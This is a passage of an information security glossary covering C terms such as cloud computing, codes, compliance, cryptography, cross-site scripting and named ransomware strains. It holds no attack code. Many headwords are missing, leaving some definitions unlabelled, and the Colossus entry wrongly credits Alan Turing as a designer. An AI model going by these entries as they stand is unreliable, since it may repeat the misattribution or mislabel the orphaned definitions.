dodging the bullet

See near miss.

(Clarifying Lawful Overseas Use of Data) Act

Another US law with a contrived name, this one concerning requests to the US by foreign organisations for intercepted data.  Provisions in the law are intended to authorize and facilitate appropriate requests for legitimate law enforcement purposes but block inappropriate disclosures.

Cloud bursting

Capacity management technique whereby private cloud services temporarily utilize public cloud services to handle peaks in demand.

Cloud computing,
cloud services,
cloud computing services,

Provision of distributed, network-based information processing services within a Service Oriented Architecture typically giving ‘access from anywhere’ (meaning users typically only need a compatible browser and network connection) and service elasticity or flexibility (adjusting performance by dynamically allocating capacity behind-the-scenes from pooled resources using the CSP’s automated systems- and network-management processes).  However, cloud computing can raise governance, ownership, compliance and other information security and privacy issues.


This cloud-based commercial service offered to crack by brute force attack on the NT hash values used as part of the PPTP (Point to Point Tunnelling Protocol) and MS-CHAP cryptographic processes.

Cloud Smart

The common name of a US government federal strategy on cloud computing, including the commercial, information security and other aspects.  A 2018 update to Cloud First, the original strategy from 2010.

Cloud storage,
Web storage,
online storage

Facility to access remotely stored data through the Internet.  As with cloud computing, the geographical storage location is unknown to the user which can raise governance, ownership, compliance and other information security and privacy issues, while the involvement of external organisations and network communications may expose proprietary data to various risks including unauthorized access, corruption and denial of service.


Two or more closely-coupled computer servers configured to appear as a single operating unit, sharing the processing load and (usually) disks.  Can provide higher availability/resilience and performance than a single computer, albeit with additional costs, complexity and associated constraints.

Cluster of PII

“PII which is processed for a consistent functional purpose.   Note: Clusters of PII are described independent from technical representation of data objects.  On a regular basis, the clusters of PII also include PII which is not stored electronically” (ISO/IEC 27555 draft).

(Common Malware Enumeration)

Process run by MITRE to assign a common ID to new malware that may otherwise be identified/named independently by several antivirus companies or malware analysts, causing confusion.

(Cybersecurity Maturity Model Certificate)

US Department of Defense cybersecurity assurance scheme for assessing/auditing and rating defense suppliers between “Basic Cybersecurity Hygiene” and “Advanced” levels, according to the nature and quality of the cybersecurity controls they are operating, in order to protect CUI as it is passed through supply chains.


US Committee on National Security Systems Instruction № 4009: Glossary.  


The use of words, symbols, strings, phrases, sounds or images to represent and communicate messages.  A relatively crude application of (usually monoalphabetic) substitution, rendered somewhat more secure through the use of multiple code books, one-time pads, steganography etc.  For example, “Attack at dawn!” might be represented or signalled by the seemingly innocuous mention of, say, “native daffodils” at some point in an otherwise legitimate news broadcast, web page, press release, blog posting, tweet or private ad in the personal columns of a national newspaper.  Codes (such as Morse code, ASCII and ‘computer code’ meaning program instructions) and obscure languages (such as Navajo or Cockney) are not necessarily deliberately secretive, cryptic or covert but may appear so to non-experts.

Code book,

If the list of code words etc. is too long to remember and communicate reliably to those who need to code or decode messages, it may be necessary to prepare and distribute one or more lists from which to lookup codes and their plaintext equivalents.  The security issues are similar to those associated with the generation and distribution of encryption keys e.g. ensuring that code books do not fall into enemy hands and cannot simply be reconstructed by the enemy through educated guesswork or cryptanalysis.

Code injection

Hacking techniques to insert malicious content into programs during their execution, exploiting various operating system and application flaws and bugs, specifically injection flaws.  Used by some malware.  See also AtomBombing, XSS and HTML injection.

Code of ethics

A comprehensive set of rules, ideals, objectives, principles, practices and/or values deemed ethical by the organisation, culture or society.  Given that a written code cannot realistically cover all possible ethical issues, a substantial part inevitably remains unstated: however, workers are expected to interpret and apply the guidance sensibly when facing novel situations and dilemmas, acting in the best interests of the organisation, culture or society.

Code Red

A network worm that infected insecure unpatched Web servers running Microsoft IIS software in 2001. Websites were defaced with “HELLO! Welcome to! Hacked By Chinese!”


Assertively or aggressively forcing someone to do something against their wishes (e.g.  pay a ransom to recover their data), typically through physically intimidating, threatening or blackmailing them, putting them under duress.


The magnetic force that will completely demagnetize a ferromagnetic material such when wiping the data stored on hard disk or mag-stripe bank card.  Measured in Teslas.  “A property of magnetic material, used as a measure of the amount of coercive force required to reduce the magnetic induction to zero from its remnant state” (NZ information Security Manual).

Cognitive systems

Advanced IT systems capable of artificial intelligence and/or machine learning, augmenting the intellectual capabilities of us humans.  While the information risks associated with cognitive systems may be challenging, they show promise in the cybersecurity field, for example intelligent network/system intrusion, malware and fraud detection, prevention and response. 


One of several species of cryptominer malware in the wild in 2018.  Infected systems mined Monero cryptocurrency for the VXers and criminals behind the attacks.


One of several nasty species of ransomware in the wild that surreptitiously and strongly encrypts victimsdata, coercing them into paying a ransom for the decryption keys.  Uses 256-bit AES.

Cold site

Secondary location with a minimalist ICT facility that is little more than a vacant room provided with electrical power and air conditioning.  It may take days, perhaps weeks to bring the site fully into operation in the event of a disaster taking out the main site, assuming sufficient ICT equipment, data backups, people etc. are available or can be obtained.  This minimalist approach to disaster recovery may be somewhat faster and less risky than buying or renting suitable accommodation on the open market and may be appropriate for low-availability ICT services that are definitely not business-critical.  See also warm site, hot site and mirror site.


(a) A set or group of related or associated items, such as data in a database or stamps.  (b) The act or process of locating and retrieving or gathering materials such as forensic evidence, intelligence or, yes, stamps.  “Process of gathering the physical items that contain potential digital evidence” (ISO/IEC 27037).


Someone who gathers intelligence on/about or from certain targets, using OSINT, HUMINT, SIGINT, black bag ops, agents and other sources plus techniques such as deception, surveillance and subterfuge.  See also agent and spy.


Conspiracy and collaboration between individuals or organisations to negate the division of responsibilities, breach Chinese walls, commit fraud etc.


Shared use of commercial data centre facilities by multiple customers.  “Installation of telecommunications facilities on the premises of other telecommunications carriers” (ISO/IEC 27011).


World’s first digital programmable computer, designed by Alan Turing, Max Newman, Tommy Flowers and colleagues at the UK Government Code and Cypher School at Bletchley Park North of London in 1943 during World War II.  Although it was programmed mechanically using patch cables and switches, its sole purpose was to break encrypted teleprinter messages by brute force attack on the keys used on the German Lorenz cryptographic machines, hence arguably it was not a general-purpose computer (cf. ENIAC) but possibly one of the first cyberweapons.

combination code

See PIN code.

Combination lock

Physical lock that can be unlocked with the correct combination – normally a short alphanumeric sequence (a PIN code).

Command and Control
(C2, C&C)

Generally, systems and processes for directing and monitoring diverse operations.  In the hacking context, C2 normally refers to the covert remote direction and management of malware botnets through the Internet by a bot master.  In the military context, C&C refers to the command structure, lines of communication etc. used to monitor and direct operations.

Comfort zone

The domain within which we feel safe and secure, and beyond which we feel uncomfortable - possibly threatened and/or vulnerable, in other words at risk.

(COMmunications INTelligence)

Spying on the content and nature of communications to gather useful intelligence information.  Part of SIGINT.

Commercially confidential,

A class of business information whose value to its owner relies in part on it being withheld from competitors, customers etc.  See also trade secret.

Commit point

Point at which one or more new, altered or deleted records is actually recorded in a database.  Well-designed database systems incorporate controls such as locks and control totals to detect and prevent certain data integrity incidents occurring before the commit point, plus journaling and checkpoints to recover from certain incidents that occur afterwards.

Common Controls Hub

Commercial service from the Unified Compliance Framework providing detailed information on compliance obligations and other information security, privacy, information risk management and governance-related practices (called “controls” within CCH) recommended or required by a wide variety of standards, laws and regulations (“authority documents”).  By systematically and painstakingly analysing the sources, they identify common/shared requirements.  CCH clients may potentially save money by implementing common controls as part of a suite (a security baseline) rather than individually and perhaps repeatedly to satisfy each compliance obligation separately.

Common Criteria
Common Criteria for Information Technology Security Evaluation

A formal, internationally-recognized scheme (defined in ISO 15408) to specify, design, develop, test, evaluate and certify secure IT systems for government and defence customers, where ‘secure’ is explicitly and formally defined through TOE, PP, ST, SFRs, SARs and EALs.  The scheme distributes the substantial costs across participating organisations (product vendors and customers) while also improving quality, reducing duplication and facilitating use of common systems etc. by various nations, agencies etc.

Communication centre

“Building where facilities for providing telecommunications business are sited” (ISO/IEC 27011).

Communications security (COMSEC)

Arrangements to protect the information content of communications, and possibly associated metadata (e.g. who is communicating, when, by what routes/mechanisms, and how much information is exchanged), and to maintain communications routes and services (e.gnetworks and point-to-point links).  Concerns confidentiality, integrity and availability of information and services.  “The measures and controls taken to deny unauthorised personnel information derived from telecommunications and to ensure the authenticity of such telecommunications” (NZ information Security Manual).

Companion virus

Virus that takes advantage of the operating system’s prioritisation of file names with certain extensions e.g. a virus calling itself may be executed in preference to game.exe, the program the user intended to run.  Companion viruses typically execute covertly then launch the intended program hoping that the user remains blissfully unaware of the subterfuge.

Compensating control

A control that is suboptimal but sufficient to mitigate a risk to some extent and/or achieve compliance with a security obligation where, for some reason, the ideal control cannot be used.  A workaround, substitute or compromise control that partially or completely addresses control gaps, weaknesses, failings or constraints elsewhere.


Capability of doing something properly, skilfully and expertly.  “Ability to apply knowledge and skills to achieve intended results” (ISO/IEC 27000).  Cfincompetent.

Competitive [or Competitor] Intelligence

The term may be explicitly defined to distinguish authentic and ethical means of gathering information on competitors (such as collating details from their websites and social media) from more illicit ones (such as hacking, social engineering, physical site penetration and other industrial espionage techniques).  However, the term is usually undefined, referring implicitly to licit and/or illicit approaches.


Risks relating to or arising from the sophistication and fragility of complicated technologies, systems, processes etc. generally constrains the level of information security achieved in practice, although paradoxically the converse applies in the case of certain controls such as passwords, cryptographic keys, cyphertext and locks.


Assured conformance with information security objectives, controls etc. defined internally by the organisation in policies etc. and/or externally by third parties (e.g. laws, industry regulations, standards and contractual terms).  May be independently checked by competent and authorized third parties, for example a certification body.  Also, in some organisations, used as the name of the corporate department or function overseeing compliance-related activities.

Comprehensive National Cybersecurity Initiative

US strategic program to improve the cybersecurity capabilities of government agencies and critical national infrastructure, initiated under George W. Bush in 2008.  See also the NIST Cybersecurity Framework.


Generally, a deliberate attack that intentionally causes an event or incident.  Sometimes more loosely refers to any situation that bypasses or disables security controls, or that threatens or merely has the potential to harm or weaken an organisation or individual in some way.

Compromising emanation

US military term for stray electromagnetic radiation from devices that may inadvertently disclose sensitive information.  “Unintentional signal that, if intercepted and analyzed, would disclose the information transferred, received, handled, or otherwise processed by any telecommunications or automated information systems equipment.” (Air Force Air Intelligence, Surveillance and Reconnaissance Agency instruction 33-203, 2011).

Computationally infeasible

Refers to the likely inability of anyone solving an extremely tough mathematical challenge using any current or projected computing technologies, algorithms or approaches, within a stated timeframe.  Implies a risk-based decision since we have imperfect knowledge of current cryptanalytical methods, vulnerabilities in cryptosystems etc., while predicting future technological advances is notoriously difficult (aside from Moore’s Law until about 2025 anyway).

Computer forensics

See digital forensics.

Computer Misuse Act

UK law criminalizes unauthorized access to a computer, unauthorized computer access with intent to commit further crime and unauthorized modification of data – in other words hacking and cracking.  The law was enacted in 1990 after Prince Phillip’s mailbox on the Prestel system had been hacked but the authorities were unable to convict the hackers responsible under extant legislation (on appeal, they were acquitted of fraud since they did not profit from the hack).

Computer Network Attack (CNA)

US military term for offensive cyberwar capability.

Computer Network Defense (CND)

US military term for defensive cyberwar capability.  [In other contexts, CND refers to the Campaign for Nuclear Disarmament.]

Computer Network Exploitation (CNE)

US military term for cyberwar reconnaissance/espionage function.

Computer Network Operations (CNO)

US military term for cyberwar capability comprising Computer Network Exploitation, Computer Network Attack and Computer Network Defense, all within Information Operations.


See fraud.


One of the first macro viruses dating back to 1995.


Tube partially protecting data or power cabling against physical/mechanical damage, fire, fluid ingress etc.  “A tube, duct or pipe used to protect cables” (NZ information Security Manual).


Very prolific network worm, released in 2008 and still in the wild in 2016.

Confidence trickster,

Someone who uses social engineering techniques such as pretexting and masquerading to establish false confidence in themselves in order to con, fool, cheat, scam or defraud victims.


Commonplace label for a class of information that is sensitive and therefore needs to be protected against unauthorized or inappropriate access.  It is normally intended for limited distribution within the organisation or to specially designated third parties, on a default deny basis.  However, the label and its meaning vary between organisations.

Confidential Informant

Law enforcement term for a spy or mole, either trained and placed within a target organisation as an undercover agent or recruited subsequently perhaps through coercion or other forms of social engineering.

in confidence

One of the three core objectives of information security, along with availability and integrity (the CIA triad), confidentiality essentially concerns the secrecy, privacy or sensitivity of information“Property that information is not made available or disclosed to unauthorized individuals, entities, or processes” (ISO/IEC 27000).

Configuration Item

A piece of technology (such as a particular document, piece of hardware, source code or compiled program) being managed through the organisation‘s configuration management system.

Configuration Management (CM)

A subset of change management activities specifically concerning control over the configuration of IT systems and infrastructure, including the parameters or settings and relationships (e.g. a certain combination of specific versions of the hardware, firmware, operating system and layered software might be tested thoroughly as a complete system, those test results potentially being invalidated if changes such as patches are made to any part).

Conflict of interest

Situation in which a person or organisation’s loyalty is (potentially or actually) divided between mutually exclusive responsibilities, for example where their obligations to a third party (e.g. to report a security incident) conflict with their self-interest (e.g. if disclosing the incident will cause adverse customer reactions or trigger enforcement actions for noncompliance).


A low-assurance form of compliance, typically asserted by the subject without independent verification“Fulfillment of a requirement.  Note: the term ‘conformance’ is synonymous but deprecated.” (ISO/IEC 27000).

Conformance tester, tester

“Individual assigned to perform test activities in accordance with a given conformance testing standard and associated testing methodology.  An example of such a standard is ISO/IEC 19790 and the testing methodology specified in ISO/IEC 24759” (ISO/IEC 19896-1:2018).


Capacity constraint e.g. through an excessive volume of traffic on a network.  Typically reduces performance and increases latency and may lead to timeouts.  Whereas congestion is normally unintentional or accidental, hackers may deliberately inject spurious network traffic in order to conceal their nefarious activities or cause IT systems to delay/drop critical security event/alert/alarm messages.

Connection forwarding

“The use of network address translation to allow a port on a network node inside a local area network to be accessed from outside the network. Alternatively, using a Secure Shell server to forward a Transmission Control Protocol connection to an arbitrary port on the local host” (NZ information Security Manual).

(Concept of Operation)

Describes the principles or mechanisms of operation of a system, control, process etc.

Consensus Assessment Initiative Questionnaire

Crude cloud computing security checklist from the CSA concerning compliance with the CCM, provided as “a set of questions a cloud consumer and cloud auditor may wish to ask of a cloud provider … a simplified distillation of the issues, best practices, and control specifications from [the CSA’s] Guidance and CCM, intended to help organisations build the necessary assessment processes for engaging with cloud providers.”  Anticipates simple binary yes/no answers to complex issues, hence (being cynical) respondents are likely to offer the most flattering responses (a systematic bias).

[of the data subject]

“Any freely given, specific, informed and unambiguous indication of the data subject's wishes by which he or she, by a statement or by a clear affirmative action, signifies agreement to the processing of personal data relating to him or her” (GDPR).  See also permission and informed consent.


The net result or outcome of a cause-effect relationship when the cause materializes.  “Outcome of an event affecting objectives.  Note: an event can lead to a range of consequences; a consequence can be certain or uncertain and in the context of information security is usually negative; consequences can be expressed qualitatively or quantitatively; initial consequences can escalate through knock-on effects.” (ISO Guide 73).


A specially-designated terminal device or port on a system intended for system management purposes such as displaying events, alerts and alarms, configuring the system etc.  Due to its privileged nature, the console should be physically secured, normally by being adjacent to the server, PABX etc. in a secure access-controlled area.  On some systems, users who have been automatically locked out of other terminals/ports (e.g. as a result of someone repeatedly trying and failing to enter their passwords) are still able to logon at the console, a control against that particular denial of service.

Conspicuous consumption

Without a credible explanation for their wealth, fraudsters and other criminals living the high life on their ill-gotten gains risk being noticed, reported and investigated by the authorities.


Taint or discredit forensic evidence, for example through gaps in the chain of custody or unexplained physical or logical changes.

Content filtering

“The process of monitoring communications such as email and web pages, analysing them for suspicious content, and preventing the delivery of suspicious content to users” (NIST SP800-114 rev1).

Content Security Policy

See CSP.

Contextual information, contextual data

Metadata that may provide additional context or supporting information enabling the nature of the associated data or information content to be guessed or interpreted more readily.


Unanticipated and often inherently unpredictable situation or information security incident or disaster (e.g. a bomb, plane crash, flood or fire), logical/technical disaster (e.gmalware outbreak, equipment breakdown, software flaw/bug, hack or similar attack on a major business system or network), business disaster (e.g. a serious fraud or hostile takeover attempt), which other controls have failed to prevent.  The appropriate responses are contingent (dependent) on the exact nature of the incident and the situation in which it occurs. 

Contingency plan,
contingency management

Forward-thinking, flexible approach for preparing and marshalling the organisation’s people and other resources to cope as effectively as possible in a contingency situation such as a major incident or disaster.  Involves preparing and exercising general purpose plans or preparations (such as forming a crisis management team from competent, capable people still available), stocking up on tools and resources (such as duct tape, walkie-talkies and white boards) and building capabilities (such as resourcefulness, adaptability and a willingness to ‘go the extra mile’ and ‘do whatever it takes’) ahead of time.  Incidents that are expected or predictable should be covered by conventional risk management activities, resilience controls, disaster recovery plans etc.

Continual improvement

Determined, conscious effort to mature or get better at doing something (or at least not to get any worse!) in a systematic, gradual way.  “Recurring activity to enhance performance” (ISO/IEC 27000).

Continuous Development

A software engineering approach involving making frequent small/incremental/evolutionary changes to a production system rather than infrequent large/revolutionary changes as in the traditional ‘waterfall’ SDLC.  See also DevOps.


Binding agreement between two or more parties, for various strengths of ‘binding’.  Formal contracts prepared by qualified lawyers and signed (‘executed’) by duly authorized representatives are normally legally binding on the parties but may be unenforceable (especially any terms deemed ‘unfair’ by the courts or overridden by laws such as the fair use provisions of copyright law).  Verbal, informal or presumed contracts may also be legally binding, although they are usually harder to prove and enforce.  If someone breaks the seal on shrink-wrapped software, for instance, they may be deemed to have accepted the license terms and conditions visible through the clear plastic film, implying a contractual commitment.  ‘Social contract’ refers to ethical commitments between the parties e.g. between worker and organisation.  Generally speaking, contracts may not be unilaterally imposed (e.gemail disclaimers), hence a signature and/or a ‘consideration’ (normally a payment) may be necessary to demonstrate someone’s willingness to commit.

protection mechanism

[Noun] Something which prevents or reduces the probability of an information security incident, indicates that an incident may have occurred and/or mitigates the damage, harm, costs or other adverse consequences caused or triggered by or simply following on from an incident.  Some controls mitigate threats (e.g. deterrents) or impact (e.g. backups), although most mitigate vulnerabilities[Verb] To exert influence over a subordinate by an authority or assertive figure.  “Measure that is modifying risk.  Notes: controls include any process, policy, device, practice, or other actions which modify risk; controls may not always exert the intended or assumed modifying effect.” (ISO/IEC 27000).


“The natural or legal person, public authority, agency or other body which, alone or jointly with others, determines the purposes and means of the processing of personal data; where the purposes and means of such processing are determined by Union or Member State law, the controller or the specific criteria for its nomination may be provided for by Union or Member State law” (GDPR).

Control objective

Describes in business terms the anticipated business purpose or benefit of an information security control, encapsulating the risk reduction requirement.  “Statement describing what is to be achieved as the result of implementing controls” (ISO/IEC 27000).

Control Self-Assessment

Typically, a regular management review process to assess the status of governance across the organisation, including information security and other forms of risk management and control.  May simply involve managers completing checklists, surveys or questionnaires, possibly then validated by further independent checks on a sample basis to ensure sufficient integrity in the responses.  Cf. Cloud Security Alliance.

Control total

A value (such as a grand total or count of the number of items) that can be used as a simple cross-check for integrity failures on a data set or process.  Used for example to confirm that all records transmitted through an interface were duly received and processed by a database, before committing the changes.


Small text file sent by a website to your browser and later retrieved, normally to track or modify your web browsing habits (marketing, surveillance and ‘carry on where you left off’ functions).  If browser settings permit, different websites may share the information in cookies, raising privacy and other information security issues.


Movement using copyright law, in stark contrast to its normal application, to permit rather than prevent free access to and collaborative or community development of intellectual property with the express requirement that derivative works are covered by the same permissive conditions.  Denoted by an inverted copyright symbol    .  See also Creative Commons and GNU General Public License

Copy protection,
copy prevention

Technical controls typically involving encryption and dongles, intended to prevent or restrict the ability of users to copy or use software and other intellectual property except on the original authentic storage media used for legitimate distribution.


Legal and moral protection giving the creators of original materials intellectual property rights over the copying, use and dissemination of the information by others with the ability to permit or prohibit various activities through licenses, contracts or agreements, for decades (typically 70 years).  Aside from being unethical and often illegal, the wanton or casual abuse of copyright (piracy and plagiarism) is a strong disincentive for creatives to continue investing in, creating and releasing intellectual property.  See also copyleft.


Costly but well-regarded commercial network security/penetration test tool from CORE SECURITY.  Automates hundreds of exploits against known vulnerabilities.

Core network

“Part of a mobile telecommunication network that connects the access network to the wider communication network.  The Internet and other public networks are examples of wider communication networks.” (ISO/IEC 27033-6).

Corporate fraud

Fraud committed against a corporation.

Corporate information security policy

Highest-level formal policy stating executive management’s overall position on information risk and security e.g. through a suite of generic principles and/or axioms“Document that describes management direction and support for information security in accordance with business requirements and relevant laws and regulations.  Note: The document describes the high-level information security requirements that have to be followed throughout the organisation.” (ISO/IEC 27033-1).


More or less complete reversal of an error“Action to eliminate a detected nonconformity (ISO/IEC 27000).

Corrective action

“Action to eliminate the cause of a nonconformity and to prevent recurrence” (ISO/IEC 27000).

Corrective control

Form of control intended to minimize, contain or reverse the damage caused by a security incident, for example restoring damaged or lost data from backups or putting out a fire.  See also preventive and detective control.

Corroborating evidence

Evidence supporting other evidence.  May not be directly related to the case e.g. an alibi supporting someone’s assertion that they were not present when a crime was committed.

Corruption, corrupt

Common form of integrity failure e.gdata corruption caused by malware, bugs and user errors, and human corruption involving coercion, bribery and dubious ethics.

(Commercial Off The Shelf [Software])

Refers to standardized as opposed to bespoke software, typically distributed to the general public in shrink-wrapped packages displaying generic and non-negotiable license agreements.


Pirated, fake copy misrepresented as an original, authentic asset, thereby infringing the true owner’s intellectual property rights and defrauding the purchaser.  Numerous mass-produced counterfeit products and bank notes are in circulation, some of which are not merely passable but so authentic that even experts struggle to distinguish them from the genuine articles … although bargain-basement pricing may be a clue!


Fraudster who counterfeits.


See spying.  See also competitive intelligence.


See control.  “Actions, devices, procedures, or techniques that meet or oppose (i.e., counters) a threat, a vulnerability, or an attack by eliminating or preventing it, by minimizing the harm it can cause, or by discovering and reporting it so that corrective action can be taken.” (CNSSI-4009).


Retaliatory attack directed against the alleged perpetrator of a prior attack.  Aside from escalating tensions and perhaps being illegal, a counterstrike may be misdirected for instance if the perpetrator was incorrectly identified, perhaps because the original attack involved spoofing or other covert, coercive or deceptive techniques.  A highly risky approach.


Government-sponsored activities such as propaganda, intelligence, surveillance and cybertage, intended to counteract, undermine, prevent or otherwise mitigate terrorism.

Cover, coverage

The scope, type or nature of insurance provided, normally defined in the policy in terms of events, perils or hazards, assets etc. included or excluded, limits of liability plus terms and conditions.


Covered.  Refers to secretive, hidden, surreptitious, undercover, quiet or silent activities or devices, generally unauthorized and malicious in nature, such as bugs used for surveillance or spying.  See also cryptic.

Covert channel,
back channel

Covert or cryptic mechanism allowing confidential information to be secretly extracted from a supposedly secure system, network or location (such as a SCIF) bypassing confidentiality controls, perhaps using steganography or out-of-band communications (e.g. manipulating a circuit’s current demand using specific operating sequences in order to pass information to an external current-monitoring device).  See also backdoorCf. side channel.


Niche US company offering support services to organisations hit by ransomware, such as negotiating ransoms.

(Centre for the Protection of National Infrastructure)

UK government security services body responsible for guidance and advice concerning physical, personnel and information (including cyber) security arrangements protecting critical national infrastructure.

(Crime Prevention Through Environmental Design)

Physical architectural design philosophy that seeks to deter attacks by criminals against people innocently using shopping malls, railway stations, walkways between parking lots and buildings etc.  For example, even lighting and landscaped areas free of hidey-holes permit more effective surveillance monitoring and escape routes for potential victims, while barriers and visual cues distinguish private from public property.  Thorny bushes near windows and walls, and razor wire deter casual if not professional intruders.

Crack, cracker, cracking

Malicious hacker or criminal, generally motivated by the prospect of personal gain.  Passwords, cryptosystems and safes may be cracked, for example by brute force attacks.


Unplanned sudden computer system or device failure resulting from an unhandled exception/error condition triggered accidentally by a bug, power glitch etc. or deliberately by a hack or malware.

Crash dump

File containing a snapshot of the contents of main memory at the time of a crash.  Used by systems programmers to analyse the status of the stack, heap, registers, buffers, pointers etc. in an attempt to discover what caused the crash.  Used by hackers to find confidential information such as passwords and encryption keys that had been held temporarily in memory.  Used by malware analysts to identify cryptic malware.

Creative Commons

A not-for-profit organisation promoting free access to and use of intellectual property as in copyleft.  Their standardized licenses cater for various situations ranging from placing information unencumbered into the public domain, through requiring attribution of the owner, to restrictions on commercial use and modification.


Something a person, system etc. presents to confirm (authenticate) their asserted identity (e.g. a passport, password, security token or digital certificate) or professional capabilities (e.grésumé or curriculum vitae plus the original, authentic education and training certificates).

Credential stuffing

Automated brute-force attack involving attempting to logon to multiple websites using lists of usernames, passwords and other credentials accumulated from other sources, such as previous hacks.  If a logon succeeds (proving the credentials valid), further information may be obtained from the compromised account, perhaps leading to direct exploitation and further compromises (identity fraud).


Believable.  Social engineers and fraudsters work hard to make their pretexts credible in order to fool their targets into trusting them inappropriately.


Classic ┐_┐_┐_┐_shaped tops to the battlements of Mediaeval castles.  Archers cowered behind the uprights for protection while raining down arrows upon the attackers below through the gaps.  An ancient physical security control.


UK-based government-supported not-for-profit organisation and scheme to test and accredit penetration testers.  Given the trusted, privileged nature of the work, testers must be competent in order for their clients to place any reliance on their assurance efforts, and must be trustworthy since they may gain access to valuable and/or confidential information assets if (when!) tested security controls fail.  See also CBEST.


Useful hint for a cryptanalyst, often consisting of some known plaintext that, for example, will reveal if the correct decryption key has been found by a brute force attack on the cyphertext.  Standard or routine parts of a message (such as a date/time stamp, predictable sequence number, message type or protocol identifier, greeting or signature) may be useful cribs.

crimeware kit,
attack toolkit,
exploit kit

Software package used to generate and/or distribute malware using libraries of technical exploits, plus the infection and remote-control elements including functions to report statistics on the status of the exploitation process.  A few crimeware kits (such as Carberp and Zeus) have been released onto the Internet.  Some are traded commercially on the black market or hacker underground.  Most are jealously guarded by the hackers who created and maintain them and/or the criminals who pay for and exploit them. 

Criminal underground

See black market.  See also hacker underground.


Chaotic situation immediately following a serious incident, characterized by disorder and panic.  Survival (of people if not the organisation) is generally the overriding priority in a crisis, hence all other considerations (including security) tend to be disregarded until the crisis subsides.

Crisis management

Management activities during a crisis such as evacuating buildings, calling the emergency services, triage and initiating incident management activities as order is gradually restored.

Critical National Infrastructure (CNI),
Critical Corporate Infrastructure (CCI),
Critical Infrastructure (CI)

Shared infrastructure services and supplies, such as electricity, water, fuel, food, telecommunications, government, law enforcement, armed services and the security services, that are considered vital for a nation (CNI) or organisation (CCI).  Significant failure of any of these, perhaps as a result of a physical or electronic attack on the ICT equipment, networks, things or people monitoring and controlling them, is likely to cause immediate disruption and substantial economic damage as well as perhaps causing injuries, deaths, environmental incidents etc., making these attractive targets in cyberwarfare.

Cross border processing

“Either (a) processing of personal data which takes place in the context of the activities of establishments in more than one Member State of a controller or processor in the Union where the controller or processor is established in more than one Member State; or (b) processing of personal data which takes place in the context of the activities of a single establishment of a controller or processor in the Union but which substantially affects or is likely to substantially affect data subjects in more than one Member State” (GDPR).

Cross Site Scripting,

Web hacking technique in which badly-designed websites (e.g. some bulletin-board systems) with inadequate data entry validation are made to return malicious URLs, HTML, JavaScript or other executable code (malware) to the user’s browser for execution (e.g. to manipulate or disclose their supposedly private cookies or other local data).  [Denoted “XSS” to avoid being confused with Cascading Style Sheets.]  A form of code injection.  See also XXE.

Crossover Error Rate

In authentication systems, the tolerance or sensitivity configuration set point at which false rejections are just as likely as false acceptances.


Study and practice of breaking cryptosystems by any means, normally through a combination of mathematics, language analysis, brilliant intuition, lots of time, powerful computers and sheer hard work.  The cryptanalyst may attempt to find and exploit mathematical or technical weaknesses in the algorithm and/or the system and processes that implement it, guess the key by brute force, or somehow disentangle the relationships between known plaintext such as a crib and the corresponding cyphertext.


Surreptitious, deliberately hidden, secretive, concealed or non-obvious, such as a fiendishly difficult crossword puzzle.  Not necessarily unauthorized or malicious.  See also covert.


Tradeable virtual currency such as Bitcoin and Litecoin.  Protected against counterfeiting by cryptographic means including blockchain.  Generated by cryptomining.


See cyphertext.

Cryptographic erase

With various important provisos concerning the level of risk, overall process, technology, algorithm, key length and complexity etc., encrypting data or perhaps overwriting it with cyphertext, and then destroying the key, may render confidential information ‘permanently’ irretrievable.  “Method of sanitization in which the encryption key for the encrypted target data is sanitized, making recovery of the decrypted target data infeasible” (ISO/IEC 27040).

Cryptographic module

Tamper-resistant computer subsystem consisting of data processing, storage and communications hardware and firmware, designed to perform cryptographic operations such as receiving, encrypting and returning a nonce using a private key in a challenge-response authentication scenario.


From the Greek words for “hidden” and “writing”, the science, study and practice of creating systems to hide information and to find and retrieve it when needed.  Involves the use of mathematical algorithms for encryption, hashing, authentication etc.

Cryptographic protocol

Specified algorithms, parameters (such as key length) and processes for establishing, using and managing cryptographic authentication, encryption etc.  “An agreed standard for secure communication between two or more entities” (NZ information Security Manual).

Cryptographic system

“A related set of hardware or software used for cryptographic communication, processing or storage, and the administrative framework in which it operates” (NZ information Security Manual).

Cryptographic system material

“Material that includes, but is not limited to, key, equipment, devices, documents and firmware or software that embodies or describes cryptographic logic” (NZ information Security Manual).


One of several nasty species of ransomware in the wild that surreptitiously and strongly encrypts victimsdata, coercing them into paying a ransom for the decryption keys.


Literally, the study of ‘hidden writing’ which encompasses both cryptography and cryptanalysis.  Confusingly also sometimes abbreviated to ‘crypto’.


Application that attempts to generate and/or validate new cryptocurrency, consuming significant computer resources (particularly the graphics processor) and power in the process.  Along with spyware, identity fraud, intellectual property theft and coercion (ransomware), cryptomining is a way for criminals to make money from malware-infected systems without their ownersknowledge and consent.


An innocuous code-name assigned to a project, assignment, system, individual, organisation, incident etc. to reduce the possibility of disclosing sensitive information.


“The useful life of the cryptographic key” (NZ information Security Manual).

cryptographic primitive

See cryptographic algorithm.


A species of ransomware in the wild in 2016.


Computer system or device that employs cryptography.  Generally taken to include the cryptographic algorithm, the key management processes, external interfaces, software supporting operations and sometimes even the entire PKI.


See key.


One of several nasty species of ransomware in the wild that surreptitiously and strongly encrypts victimsdata, coercing them into paying a ransom for the decryption keys.


A species of ransomware in the wildFlaws in the cryptosystem implementation substantially weakened this malware.


One of the earliest species of data-encrypting ransomware, in the wild in 2006.

(Control Strength)

One of the parameters in the FAIR method, CS estimates the ability for controls to mitigate risks (actually, to ‘reduce vulnerabilities’ in FAIR terms) to information assets under analysis.  Strong controls are well designed, fully implemented, highly effective, robust/resilient, unlikely to be bypassed/disabled, used, managed, maintained etc.  See also PLM, LEF, TCap and TEF.

(Cloud Security Alliance)

Industry body for CSPs and their customers, promoting good practices in the information security, privacy and risk aspects of cloud computingCf. Control Self-Assessment.

(Communications Security Establishment)

Canada’s techno-spooks, whose mission is to “provide and protect information of [Canadian] national interest through leading-edge technology”.  Responsible for SIGINT, surveillance etc.

(Cyber Security Framework)


(Canadian Security Intelligence Service)

Canada’s national intelligence agency.

(Cloud Service Provider)

An organisation offering cloud computing services, usually on a commercial basis.

(Content Security Policy)

Instructions in the HTML header concerning what the browser should or should not do with content from an appropriately-coded web page – for example, not loading or interpreting third party files containing JavaScript, ActiveX, fonts etc. that might be used for XSS or other code injection attacks on the browser.  An exception allows browser plug-ins to override the CSP, though, which is a vulnerability.  However, the presence of malicious plug-ins on a system may indicate more significant issues.

(Corporate Social Responsibility),
corporate sustainability, conscience or citizenship, sustainable or responsible business,
conscious capitalism

